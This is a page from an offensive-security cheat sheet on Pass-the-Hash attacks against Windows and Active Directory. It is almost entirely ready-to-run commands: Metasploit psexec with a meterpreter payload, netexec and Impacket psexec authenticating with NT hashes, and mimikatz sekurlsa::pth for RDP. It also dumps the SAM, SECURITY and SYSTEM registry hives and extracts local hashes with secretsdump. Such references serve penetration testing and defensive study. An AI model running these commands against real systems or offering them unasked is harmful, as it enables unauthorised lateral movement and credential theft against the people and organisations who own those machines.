hash-pass-the-hash.md (1952B)
1 --- 2 title: "Hash - Pass the Hash" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/hash-pass-the-hash.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/hash-pass-the-hash.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Hash - Pass the Hash 12 13 The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’t the built-in RID 500. 14 15 * Metasploit 16 17 ```powershell 18 use exploit/windows/smb/psexec 19 set RHOST 10.2.0.3 20 set SMBUser jarrieta 21 set SMBPass nastyCutt3r 22 # NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack. 23 # NOTE2: Require the full NT hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee) 24 set PAYLOAD windows/meterpreter/bind_tcp 25 run 26 shell 27 ``` 28 29 * netexec 30 31 ```powershell 32 nxc smb 10.2.0.2/24 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami" 33 ``` 34 35 * Impacket suite 36 37 ```powershell 38 proxychains python ./psexec.py jarrieta@10.2.0.2 -hashes :489a04c09a5debbc9b975356693e179d 39 ``` 40 41 * Windows RDP and mimikatz 42 43 ```powershell 44 sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:b73fdfe10e87b4ca5c0d957f81de6863 45 sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the users ntlm hash> /run:"mstsc.exe /restrictedadmin" 46 ``` 47 48 You can extract the local **SAM database** to find the local administrator hash : 49 50 ```powershell 51 C:\> reg.exe save hklm\sam c:\temp\sam.save 52 C:\> reg.exe save hklm\security c:\temp\security.save 53 C:\> reg.exe save hklm\system c:\temp\system.save 54 $ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL 55 ``` 56 57 ## References 58 59 * [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/)